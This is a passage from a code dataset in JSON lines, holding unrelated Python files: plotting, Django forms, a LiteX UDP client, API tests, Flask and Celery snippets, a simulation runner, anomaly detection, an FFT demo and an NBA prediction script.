plt.subplots(figsize=(7,5))\n\nmean1 = [dfx['I11'].mean(),dfx['I12'].mean(),dfx['I13'].mean(),dfx['I14'].mean(),dfx['I15'].mean()]\nmean2 = [dfx['I21'].mean(),dfx['I22'].mean(),dfx['I23'].mean(),dfx['I24'].mean(),dfx['I25'].mean()]\nmean3 = [dfx['I31'].mean(),dfx['I32'].mean(),dfx['I33'].mean(),dfx['I34'].mean(),dfx['I35'].mean()]\n\nstd1 = [1.96 * dfx['I11'].std()/np.sqrt(100), 1.96 * dfx['I12'].std()/np.sqrt(100), 1.96 * dfx['I13'].std()/np.sqrt(100),1.96 * dfx['I14'].std()/np.sqrt(100),1.96 * dfx['I15'].std()/np.sqrt(100)]\nstd2 = [1.96 * dfx['I21'].std()/np.sqrt(100),1.96 *dfx['I22'].std()/np.sqrt(100),1.96 *dfx['I23'].std()/np.sqrt(100),1.96 *dfx['I24'].std()/np.sqrt(100),1.96 *dfx['I25'].std()/np.sqrt(100)]\nstd3 = [1.96 * dfx['I31'].std()/np.sqrt(100),1.96 *dfx['I32'].std()/np.sqrt(100),1.96 *dfx['I33'].std()/np.sqrt(100),1.96 *dfx['I34'].std()/np.sqrt(100),1.96 *dfx['I35'].std()/np.sqrt(100)]\n\nindex = dfx[dfx['arrivals'].notnull()]['arrivals']\n\nax.bar(index - bar_width, mean1, bar_width, label= 'Infrastructure Provider $InP_1$', yerr=std1, capsize=7);\nax.bar(index, mean2, bar_width, label= 'Infrastructure Provider $InP_2$', yerr=std2, capsize=7);\nax.bar(index + bar_width , mean3, bar_width, label= 'Infrastructure Provider $InP_3$', yerr=std3, color= 'gray',capsize=7);\n\nax.yaxis.grid(linestyle=':',linewidth=1.5)\n\n# Hide the right and top spines\nax.spines['right'].set_visible(False)\nax.spines['top'].set_visible(False)\n\nplt.tick_params(axis='both', which='major', labelsize=14)\nax.legend(loc=1,prop={'size': 14})\n\nax.set_ylim(ymin=0,ymax=1)\nax.set_xlim(xmin=0,xmax=5.35)\nplt.xlabel('request arrival rate ' +'$\\lambda$', fontsize=14)\nplt.ylabel('average fraction of requests assigned to $InP_x$', fontsize=14)\nax.set_axisbelow(True)\n\nplt.savefig('ev_winners_L1.png')\nplt.show();\n\n\n","sub_path":"evaluation/winners1.py","file_name":"winners1.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"507253356","text":"from django import forms\n\nfrom .models import Topic, Entry\n\nclass TopicForm(forms.ModelForm):\n class Meta:\n model = Topic\n fields = ['text']\n labels = {'text': ''}\n \nclass EntryForm(forms.ModelForm):\n class Meta:\n model = Entry\n fields = ['text']\n labels = {'text': ''}\n widgets = {'text': forms.Textarea(attrs={'cols': 80})}\n\ndef edit_entry(request, entry_id):\n\t'''edit an existing entry'''\n\tentry = Entry.objects.get(id=entry_id)\n\ttopic = entry.topic\n\t\n\tif request.method != 'POST':\n\t\t#initial request; pre-fill form with the current entry.\n\t\tform = EntryForm(instance=entry)\n\t\t\n\telse:\n\t\t#POST data submitted; process data.\n\t\tform = EntryForm(instance=entry, data=request.POST)\n\t\t\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn HttpResponseRedirect(reverse('learning_logs:topic', args=[topic.id]))\n\t\t\t\n\tcontext = {'entry':entry, 'topic':topic, 'form':form}\n\treturn render(request, 'learning_logs/edit_entry.html', context)\n\t\t\t\n\n","sub_path":"Learning_log/learning_logs/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"273947747","text":"import socket\n\nfrom litex.soc.tools.remote.etherbone import EtherbonePacket, EtherboneRecord\nfrom litex.soc.tools.remote.etherbone import EtherboneReads, EtherboneWrites\nfrom litex.soc.tools.remote.csr_builder import CSRBuilder\n\nclass 
CommUDP(CSRBuilder):\n def __init__(self, server=\"192.168.1.50\", port=1234, csr_csv=\"csr.csv\", csr_data_width=None, debug=False):\n if csr_csv is not None:\n CSRBuilder.__init__(self, self, csr_csv, csr_data_width)\n self.server = server\n self.port = port\n self.debug = debug\n\n def open(self):\n if hasattr(self, \"tx_socket\"):\n return\n self.tx_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.rx_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.rx_socket.bind((\"\", self.port))\n\n def close(self):\n if not hasattr(self, \"tx_socket\"):\n return\n self.tx_socket.close()\n del self.tx_socket\n self.rx_socket.close()\n del self.rx_socket\n\n def read(self, addr, length=None):\n length_int = 1 if length is None else length\n record = EtherboneRecord()\n record.reads = EtherboneReads(addrs=[addr+4*j for j in range(length_int)])\n record.rcount = len(record.reads)\n\n packet = EtherbonePacket()\n packet.records = [record]\n packet.encode()\n self.tx_socket.sendto(bytes(packet), (self.server, self.port))\n\n datas, dummy = self.rx_socket.recvfrom(8192)\n packet = EtherbonePacket(datas)\n packet.decode()\n datas = packet.records.pop().writes.get_datas()\n if self.debug:\n for i, value in enumerate(datas):\n print(\"read {:08x} @ {:08x}\".format(value, addr + 4*i))\n return datas[0] if length is None else datas\n\n def write(self, addr, datas):\n datas = datas if isinstance(datas, list) else [datas]\n length = len(datas)\n record = EtherboneRecord()\n record.writes = EtherboneWrites(base_addr=addr, datas=iter(datas))\n record.wcount = len(record.writes)\n\n packet = EtherbonePacket()\n packet.records = [record]\n packet.encode()\n self.tx_socket.sendto(bytes(packet), (self.server, self.port))\n\n if self.debug:\n for i, value in enumerate(datas):\n print(\"write {:08x} @ {:08x}\".format(value, addr + 4*i))\n","sub_path":"litex/soc/tools/remote/comm_udp.py","file_name":"comm_udp.py","file_ext":"py","file_size_in_byte":2393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"154272338","text":"# coding=utf-8\r\n__author__ = 'wujiayi'\r\n__time__ = '2019/10/9 12:18'\r\n\r\nimport allure\r\nimport pytest\r\n\r\nfrom Params.params import Basic\r\nfrom Conf.Config import Config\r\nfrom Common import Request\r\nfrom Common import Consts\r\nfrom Common import Assert\r\n\r\n\r\n@pytest.allure.feature('基础模块')\r\nclass TestBasic:\r\n\r\n\t@allure.severity('blocker')\r\n\t@allure.story('Basic')\r\n\t@pytest.mark.filterwarnings(\"ignore\")\r\n\tdef test_basic_01(self, action):\r\n\t\t\"\"\"\r\n\t\t\t用例描述:未登陆状态下查看基础设置\r\n\t\t\"\"\"\r\n\t\tconf = Config()\r\n\t\tdata = Basic()\r\n\t\ttest = Assert.Assertions()\r\n\t\trequest = Request.Request(action)\r\n\r\n\t\treq_url = conf.host_debug\r\n\t\turls = data.url\r\n\t\t# params = data.data\r\n\t\theaders = data.header\r\n\r\n\t\tapi_url = req_url + urls[0]\r\n\t\tresponse = request.get_request(api_url, None, headers[0])\r\n\r\n\t\tassert test.assert_code(response['code'], 200)\r\n\t\tassert test.assert_body(response['body'], 'code', 1)\r\n\t\tassert test.assert_body(response['body'], 'message', '操作成功')\r\n\t\tassert test.assert_time(response['time_consuming'], 500)\r\n\t\tConsts.RESULT_LIST.append('True')\r\n","sub_path":"TestCase/test_basic.py","file_name":"test_basic.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"646467987","text":"#!/usr/bin/env python\n# 
coding=utf-8\n\nimport os\nimport json\nimport requests\nfrom myapp import celery, connect_redis, get_token\nfrom myapp.tasks.sms import kzbot\n\nheaders = {'Content-Type': 'application/json'}\n\nr = connect_redis(1)\n\n@celery.task\ndef get_job(env):\n '''\n 轮询函数,用于获取job_id\n '''\n print(env)\n token = get_token(env)\n url = f'https://api.kzfeed.com/bot/{token}/getJob'\n print(url)\n job = requests.get(url, headers=headers)\n print(job.json())\n if job.json()['errno']==0:\n job_id = job.json()['job']['job_id']\n uuid = job.json()['job']['params']['uuid'] \n if r.set(uuid, job_id, nx=True) == True:\n title = '欢迎您使用PMBotd订阅信息服务!'\n content = f\"请将下面的链接添加到post:\\nhttp://api.senlief.xyz/pmbot/sms/{uuid}\"\n kzbot(job_id, title, content)\n return 'Add a new job!'\n else:\n return 'Not a new job'\n else:\n return 'get job error!'","sub_path":"myapp/tasks/job.py","file_name":"job.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"399145588","text":"import os\nimport sys\n\nfrom flask import Flask, request, render_template\n\n# In python we can create object instances \n# and assign them to variables for safekeeping!\napp = Flask(__name__)\n\n# Here we tell the server that whenever someone goes to\n# \"/\", it needs to show them the home page\n@app.route(\"/\")\ndef home():\n return render_template(\"v12/home.html\")\n\n# Don't worry about this! It's just some settings for\n# the server to follow\nif __name__ == \"__main__\":\n port = int(os.environ.get(\"PORT\", 5000))\n app.run(host='0.0.0.0', port=port, threaded=True, debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"477851811","text":"from utils import Context\n\nasync def attempt_vc_connect(ctx: Context):\n if ctx.message.author.voice is None:\n await ctx.reply('You are not in a voice channel')\n return \n voice_channel = ctx.message.author.voice.channel\n if ctx.message.guild.voice_client is None:\n await voice_channel.connect()\n voice_client = ctx.message.guild.voice_client\n if voice_client.channel != voice_channel:\n await ctx.reply(f'Sorry, I am already in <#{voice_client.channel.id}> with people~')\n return \n return voice_client","sub_path":"tasks/vc_utils.py","file_name":"vc_utils.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"25396240","text":"\"\"\" Run all TurbSim input files in specified directory.\n\n Jenni Rinker, 08-Apr-2015\n\"\"\"\nimport os\n\n# directory name\ndname = '2-myflag'\n\n# get list of input files\nfiles = os.listdir(dname)\nfor file in files:\n if file.endswith('.inp'):\n os.system(os.path.join(dname,'TurbSim_glin64') + ' ' + \\\n os.path.join(dname,file))\n","sub_path":"archive/turbsim_v2.0-modification_fromZip/RunAllTSInp.py","file_name":"RunAllTSInp.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"312418484","text":"#!/usr/local/bin/python3\n# coding: UTF-8\n# Author: David\n# Email: youchen.du@gmail.com\n# Created: 2017-03-03 20:52\n# Last modified: 2017-03-03 21:26\n# Filename: anomaly.py\n# Description:\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nfrom scipy import stats\nfrom scipy.io import loadmat\n\n\ndef estimate_gaussion(X):\n 
mu = X.mean(axis=0)\n sigma2 = X.var(axis=0)\n\n return mu, sigma2\n\n\ndef select_threshold(pval, yval):\n best_epsilon = 0\n best_f1 = 0\n f1 = 0\n\n step = (pval.max() - pval.min()) / 1000\n\n for epsilon in np.arange(pval.min() + step, pval.max(), step):\n preds = pval < epsilon\n\n tp = np.sum(np.logical_and(preds == 1, yval == 1).astype(float))\n fp = np.sum(np.logical_and(preds == 1, yval == 0).astype(float))\n fn = np.sum(np.logical_and(preds == 0, yval == 1).astype(float))\n\n precision = tp / (tp + fp)\n recall = tp / (tp + fn)\n\n f1 = 2 * precision * recall / (precision + recall)\n\n if f1 > best_f1:\n best_f1 = f1\n best_epsilon = epsilon\n\n return best_epsilon, best_f1\n\n\ndata = loadmat('ex8data1.mat')\nX = data['X']\nXval = data['Xval']\nyval = data['yval']\n\nfig, ax = plt.subplots(figsize=(12, 8))\nax.scatter(X[:, 0], X[:, 1])\nax.set_xlabel('Latency (ms)')\nax.set_ylabel('Throughput (mb/s)')\nax.set_xlim((0, 30))\nax.set_ylim((0, 30))\n\nmu, sigma2 = estimate_gaussion(X)\np = np.zeros(X.shape)\np[:, 0] = stats.norm(mu[0], sigma2[0]).pdf(X[:, 0])\np[:, 1] = stats.norm(mu[1], sigma2[1]).pdf(X[:, 1])\n\npval = np.zeros(Xval.shape)\npval[:, 0] = stats.norm(mu[0], sigma2[0]).pdf(Xval[:, 0])\npval[:, 1] = stats.norm(mu[1], sigma2[1]).pdf(Xval[:, 1])\n\nepsilon, f1 = select_threshold(pval, yval)\noutliers = np.where(p < epsilon)\nfig, ax = plt.subplots(figsize=(12, 8))\nax.scatter(X[:, 0], X[:, 1])\nax.scatter(X[outliers[0], 0], X[outliers[0], 1], s=50, color='r', marker='o')\nax.set_xlabel('Latency (ms)')\nax.set_ylabel('Throughput (mb/s)')\nax.set_xlim((0, 30))\nax.set_ylim((0, 30))\n\n\nplt.show()\n","sub_path":"Machine Learning/Python/Anomaly Detection and Recommender Systems/anomaly.py","file_name":"anomaly.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"553238957","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef f(x):\n\tif abs(x)<1 :\n\t\treturn 1\t\t\t#Defining box function\n\telse:\n\t\treturn 0\nfor i in range(3):\n\tN=int(input(\"Enter the value of N:\"))\t\t# user input N. 
The program takes three inputs and compute the result one after another.\n\tx_min=-50\n\tx_max=50\n\tx=np.linspace(x_min,x_max,N)\n\td=(x_max-x_min)/(N-1)\n\tfx,fk=[],[]\n\n\tfor i in range(N):\n\t\tfx.append(f(x[i]))\t\t\t# the box function array\n\n\tdft=np.fft.fft(fx,norm='ortho')\t\t\t#performing DFT\n\tk=2*np.pi*np.fft.fftfreq(N,d)\t\t\t#sampling k values\n\n\tfactor=np.exp(-1j*k*x_min)\n\n\tFT=d*np.sqrt(N/(2*np.pi))*factor*dft\t\t#Fourier transform\n\n\t#Plotting\n\tfig, ax= plt.subplots(1,2)\n\tfig.suptitle(\"p10:Fourier transform with sampling rate {:,.4f}\".format(d))\n\tax[0].plot(x,fx,'blue',label=\"box function\")\n\tax[0].set_xlabel(r'$x\\rightarrow$',fontsize=15)\n\tax[0].legend()\n\tax[0].set_ylabel(r'$f(x)\\rightarrow$',fontsize=15)\n\tax[1].plot(k,FT,'red',label=\"FT of box function\")\n\tax[1].set_xlabel(r'$k\\rightarrow$')\n\tax[1].set_ylabel(r'$\\tilde{f}(k)\\rightarrow$')\n\tax[1].legend()\n\tplt.show()\n\n\n\n\n\n","sub_path":"p10.py","file_name":"p10.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"385328925","text":"\"\"\"Import Django models.\"\"\"\nfrom django.db import models\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom .base import Base\nfrom .meal import Meal\nfrom ..fields import VISIBILITY_CHOICES\n\nFOOD_CHOICES = (\n (1, 'Soup'),\n (2, 'Main course'),\n)\n\n\nclass Food(Base):\n \"\"\"Stores food types.\"\"\"\n\n name = models.CharField(\n verbose_name=_(\"Name\"),\n help_text=_(\"eg. Fish and chips\"),\n max_length=127,\n )\n capacity = models.PositiveIntegerField(\n verbose_name=_(\"Capacity\"),\n default=None,\n null=True,\n blank=True,\n )\n meal = models.ForeignKey(\n Meal,\n verbose_name=_(\"Meal\"),\n )\n visibility = models.PositiveIntegerField(choices=VISIBILITY_CHOICES)\n\n def __str__(self):\n \"\"\"Return name as string representation.\"\"\"\n return self.name\n","sub_path":"api/models/food.py","file_name":"food.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"300440340","text":"print(\"CÂU 3: \")\nA = array([[-2,5,9],[7, 1, 1],[-3,7,-1] ])\nb = array([1, 6, -26])\nx0 = array([0,0,0])\ntol = 1e-6 \nnmax=50\neps = 1e-6\n\nprint(\"Phuong phap Jacobi:\")\ndef jacobi(A,b,nmax,tol):\n \n d = diag(A)\n N = diagflat(d) \n R = A-N\n G = - dot(inv(N),R)\n f = dot(inv(N),b)\n \n for n in range(50):\n x_j = dot(G,x0) + f;\n err = norm(dot(A,x_j)-b,1)\n if err < eps :\n print(\"x can tim: \",x_j)\n print(\"sai so: \",err)\n return x_j\n break\n return x_j\n\nx = jacobi(A,b,nmax,eps)\nprint(\"Nghiem la:\",x) \n\n \nprint(\"Phuong phap Gauss_Seidel:\")\ndef gauss_seidel(A,b,nmax,eps):\n \n N = tril(A) \n R = A - N\n G = - dot(inv(N),R)\n f = dot(inv(N),b)\n \n for n in range(100):\n x_gs = dot(G,x0) + f;\n err = norm(dot(A,x_gs)-b,1)\n if err < eps:\n print(\"x can tim: \",x_gs)\n print(\"sai so: \",err)\n return x_gs\n break\n return x_gs\n\nx = gauss_seidel(A,b,nmax,eps)\nprint(\"Nghiem la:\",x)\n\nfrom numpy import array, diag, diagflat,dot, tril\nfrom numpy.linalg import inv, norm\n\n \n","sub_path":"Bai Giua Ky/USB 2/chuchikien-17001515-01/Chuchikien-17001515- 01.py","file_name":"Chuchikien-17001515- 01.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"116864566","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDefault settings for 
GWH.\n\n\"\"\"\n\nfrom __future__ import unicode_literals\n\n__author__ = 'Kyle Martineau-McFarlane'\n\n\nsecret = 'insert unique high-entropy secret'\n\napplications = {\n 'my_site': [\n 'echo',\n 'Enter a command to run in settings.py',\n ]\n}\n","sub_path":"settings-example.py","file_name":"settings-example.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"94890677","text":"\"\"\"\nckwg +31\nCopyright 2015-2016 by Kitware, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions are met:\n\n * Redistributions of source code must retain the above copyright notice,\n this list of conditions and the following disclaimer.\n\n * Redistributions in binary form must reproduce the above copyright notice,\n this list of conditions and the following disclaimer in the documentation\n and/or other materials provided with the distribution.\n\n * Neither name of Kitware, Inc. nor the names of any contributors may be used\n to endorse or promote products derived from this software without specific\n prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS ``AS IS''\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\nARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR CONTRIBUTORS BE LIABLE FOR\nANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n==============================================================================\n\nVital Python Error handler class\n\n\"\"\"\n# -*- coding: utf-8 -*-\n\nimport ctypes\n\nfrom vital.util.VitalObject import VitalObject\nfrom vital.exceptions.base import VitalBaseException\n\n\n# noinspection PyPep8Naming\nclass VitalErrorHandle (VitalObject):\n \"\"\" Error handling structure used in C interface \"\"\"\n\n # noinspection PyPep8Naming\n class C_TYPE (ctypes.Structure):\n \"\"\"\n C Interface structure\n \"\"\"\n _fields_ = [\n (\"error_code\", ctypes.c_int),\n (\"message\", ctypes.c_char_p),\n ]\n\n C_TYPE_PTR = ctypes.POINTER(C_TYPE)\n\n def __init__(self):\n super(VitalErrorHandle, self).__init__()\n self._ec_exception_map = {}\n\n def _new(self):\n \"\"\"\n Create a new error handle instance.\n \"\"\"\n eh_new = self.VITAL_LIB['vital_eh_new']\n eh_new.restype = self.C_TYPE_PTR\n c_ptr = eh_new()\n if not c_ptr:\n raise RuntimeError(\"Failed construct new error handle instance\")\n return c_ptr\n\n def _destroy(self):\n eh_del = self.VITAL_LIB['vital_eh_destroy']\n eh_del.argtypes = [self.C_TYPE_PTR]\n eh_del(self._inst_ptr)\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n if exc_type is not None:\n return False\n else:\n self.propagate_exception()\n return True\n\n @property\n def error_code(self):\n return self.c_pointer[0].error_code\n\n @property\n def message(self):\n return self.c_pointer[0].message\n\n def set_exception_map(self, ec_exception_map):\n \"\"\"\n Extend the current 
return code to exception mapping.\n\n :param ec_exception_map: Dictionary mapping integer return code to an\n exception type, or function returning an exception instance, that\n should be raised. If a function is provided it should accept one\n positional argument that is the string message of the exception.\n :type ec_exception_map: dict[int, BaseException | types.FunctionType]\n\n \"\"\"\n self._ec_exception_map.update(ec_exception_map)\n\n def propagate_exception(self):\n \"\"\"\n Raise appropriate Python exception if our current error code is non-zero\n\n By default, if a non-zero error code is observed, a generic\n VitalBaseException is raised with the provided error handle message.\n\n If an exception map was set via set_exception_map(...) and the error\n code matches an entry, that will be raised instead.\n\n \"\"\"\n if self.error_code != 0:\n if self.error_code in self._ec_exception_map:\n raise self._ec_exception_map[self.error_code](self.message)\n else:\n raise VitalBaseException(self.message)\n","sub_path":"vital/bindings/python/vital/util/error_handle.py","file_name":"error_handle.py","file_ext":"py","file_size_in_byte":4388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"626452544","text":"from __future__ import division\nfrom bs4 import BeautifulSoup\nfrom urllib2 import urlopen \nimport requests\nimport re \nimport random\nimport nbadata as data \nimport sys\nsys.setrecursionlimit(100000000) \n# THIS IS A PSEUDO-LEARNING ALGORITHM, IT TAKES IN N AMOUNT OF DATA AND RECURSIVELY\n# APPLIES DIFFERENT WEIGHTS TO EACH DATA POINT, UNTIL IT REACHES THE DESIRED OUTCOME (POINTSFOR/POINTSAGAINST)\n# THE WEIGHTS ARE ORDINAL, (1,2,3 ....N) \n\nerror = .0001\n\nteams = [\"atlanta\",\"boston\", \"brooklyn\",\"charlotte\",\"chicago\",\"cleveland\",\"dallas\",\"denver\",\"detroit\",\"goldenstate\",\"houston\",\"indiana\",\"laclippers\",\"lalakers\",\"memphis\",\"miami\",\"milwaukee\",\"minnesota\",\"neworleans\",\"newyork\",\"oklahomacity\",\"orlando\",\"philadelphia\",\"phoenix\",\"portland\",\"sacramento\",\"sanantonio\",\"toronto\",\"utah\",\"washington\"]\nstatsurl = \"http://www.nbastuffer.com/2015-2016_NBA_Regular_Season_Advanced_Stats.html\"\n# IMPORTS FUNCTION FROM NBADATA.PY TO SCRAPE WEBSITE ABOVE\n\ndef containsteamname(string,i=14):\n if (i< 0 or i > 28):\n return False\n elif (teams[i] in string):\n return True\n elif (string < teams[i]):\n return (containsteamname(string,i-1))\n elif (string > teams[i]):\n return (containsteamname(string,i+1))\n\n\n# def start(url,matches,teams,weights):\n# leaguedata = data.getdata(url)\n# i = 0\n# atlanta = \"atlanta\"\n# boston = \"boston\"\n# for team in leaguedata:\n# vars()['atlanta'] = team\n# print(atlanta)\n# init(dallas,philadelphia,dalvsphi,weights)\n\ndef getnextteam(count,games):\n if (nextteam > (len(games) -1)):\n return 0\n count += 1\n games = [[boston,houston,111/95,currentweights],[oklahomacity,memphis,114/122,currentweights],[atlanta,brooklyn,.977777,currentweights],[charlotte,newyork,94/102,currentweights],[minnesota,miami,103/91,currentweights]]\n\n\ndef normalize(team):\n i = 0\n for stat in team:\n if (stat > 50):\n stat = stat / 10\n team[i] = stat\n i += 1\n elif (stat <= 1):\n stat = stat * 10 \n team[i] = stat\n i += 1\n else: \n i+=1\n return team\n# DELETES STRING FROM TEAM1,TEAM2 AND NORMALIZES THE DATA \n# team1 = away \ndef init(team1,team2,outcome,weights):\n print(\"starting loop for \" + str(team1[0]) + \" and \" + str(team2[0]))\n length = 
len(team1)\n if (length != len(team2)):\n print(\"TEAM STATS ARE NOT THE SAME LENGTH!!\")\n\n # APPEND HOME = 1 , AWAY = 0\n team1[0] = 0\n team2[0] = 1\n\n team1 = [float(value) for value in team1]\n # team1 = [int(value) for value in team1]\n team2 = [float(value) for value in team2]\n team1[4] = 100 - team1[4]\n team1[8] = 100 - team1[8]\n team2[4] = 100 - team2[4]\n team2[8] = 100 - team2[8]\n\n team1 = normalize(team1)\n team2 = normalize(team2)\n\n return run(team1,team2,outcome,weights)\n\ndef run(team1,team2,outcome,weights): \n #APPLY WEIGHTS\n zip1 = zip(team1,weights) \n zip2 = zip(team2,weights)\n weightedstats1 = [elem[0] * elem[1] for elem in zip1]\n weightedstats2 = [elem[0] * elem[1] for elem in zip2]\n weightedstats1 = sum(weightedstats1)\n weightedstats2 = sum(weightedstats2)\n guess = weightedstats1/weightedstats2\n\n return compare(team1,team2,guess,outcome,weights)\n\nresults = []\n# ASSESS IF WEIGHTS ACHIEVED CORRECT OUTCOME\ndef compare (team1,team2,guess,outcome,weights):\n if (weights == currentweights):\n results = []\n if (abs(outcome - guess) < error):\n print(\"guess: \" + str(guess) + \" Correct = \" + str(outcome))\n print(\"order of weights\")\n print(weights)\n print(\"HOME GP PF PA DIFF POSS OEFF DEFF DIFF ODIFF RESTREN STREN CONS A4 WIN LOSS % PROJ PROJ2 ACH \")\n results += [weights]\n if (getnextteam() == 0):\n return results\n else:\n start = getnextteam()\n init(start[0],start[1],start[2],start[3])\n\n else:\n print(\"next recursion. Guess off by: \")\n print(abs(guess-outcome))\n return shuffle(team1,team2,outcome,weights,guess)\n\n# FIND WHICH STAT FAVORS THE TEAM THAT WAS UNDERVALUED IN THE GUESS AND INCREMENT IT BY ONE\ndef shuffle(team1,team2,outcome,weights,guess):\n # IF OUTCOME < GUESS: TEAM1 IS OVERVALUED IN GUESS\n if ((outcome - guess) < 0):\n diff = []\n maxvalue= 0\n weightindex = 0\n it = 0\n for i in range(len(team1)):\n diff += [team2[i] - team1[i]]\n for value in diff:\n if (value > maxvalue):\n maxvalue = value\n weightindex = it\n it += 1\n weights[weightindex] += 1\n return run(team1,team2,outcome,weights)\n else: \n diff = []\n maxvalue= 0\n weightindex = 0\n it = 0\n for i in range(len(team1)): \n diff += [(team1[i] - team2[i])]\n for value in diff:\n if (value > maxvalue):\n maxvalue = value\n weightindex = it\n it += 1\n weights[weightindex] += 1\n return run(team1,team2,outcome,weights)\n\n\n\n\ndef predictinit(team1,team2,avgweights):\n print(\"starting loop for \" + str(team1[0]) + \" and \" + str(team2[0]))\n length = len(team1)\n if (length != len(team2)):\n print(\"TEAM STATS ARE NOT THE SAME LENGTH!!\")\n\n # APPEND HOME = 1 , AWAY = 0\n team1[0] = 0\n team2[0] = 1\n # SHRINK HIGH VALUES, RAISE LOW VALUES\n\n team1 = [float(value) for value in team1]\n # team1 = [int(value) for value in team1]\n team2 = [float(value) for value in team2]\n team1 = normalize(team1)\n team2 = normalize(team2)\n return makeprediction(team1,team2,avgweights)\n\ndef makeprediction(team1,team2,avgweights):\n #APPLY WEIGHTS \n zip1 = zip(team1,avgweights) \n zip2 = zip(team2,avgweights)\n weightedstats1 = [elem[0] * elem[1] for elem in zip1]\n weightedstats2 = [elem[0] * elem[1] for elem in zip2]\n weightedstats1 = sum(weightedstats1)\n weightedstats2 = sum(weightedstats2)\n guess = weightedstats1/weightedstats2\n return guess \n\nbestweights = [15, 7, 3, 8, 17, 4, 11, 5, 14, 6, 19, 13, 18, 16, 10, 9, 12, 1, 2]\ncurrentweights = [15, 7, 3, 8, 17, 4, 11, 5, 14, 6, 19, 13, 18, 16, 10, 9, 12, 1, 2]\n\n\nweightseries = init(dallas,philadelphia, 
92/86,currentweights)\n# avgweights = []\n# for i in range(len(currentweights)):\n#     avg = (weights1[i] + weights2[i] + weights3[i] + weights4[i] + weights5[i] + weights6[i] + weights7[i]) / len(currentweights)\n#     avgweights += [avg]\nprint(weightseries)\n\ngame = predictinit(charlotte,newyork,avgweights)\ngame4 = predictinit(cleveland,detroit,avgweights)\nprint(\"charlotte new york\" + str(game))\nprint(\"cleveland at detroit\" + str(game4))\n\n","sub_path":"web/nba/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"68813658","text":"from flask import Flask\nfrom flask import render_template\nimport json\nimport pymongo\n\napplication = Flask(__name__)\napplication.config.from_object('config') #Need to have a secret key for WTForms\n\n@application.route('/') #Simple page, serves up index with a WTForm\ndef index():\n\treturn render_template('index.html')\n\n#\n#@application.route('/tweets/<handle>', methods=['GET']) #Actually gets tweets - called asynchronously via jQuery\n#def get_tweets_from_handle(handle):\n#\tarray = Reader.tweet_array(handle)\n#\treturn json.dumps(array)\n\n@application.route('/songs/<year>', methods=['GET']) #Gets the user some people to follow\ndef get_songs_from_handle(year):\n\tsongs = {'Something':'something else', '1':'2', 'year':year } \n\treturn json.dumps(songs)\n\nif __name__ == '__main__':\n\tapplication.debug = True\n\tapplication.run(host='0.0.0.0', debug=True)\n","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"8087394","text":"# Copyright 2017 Google Inc. 
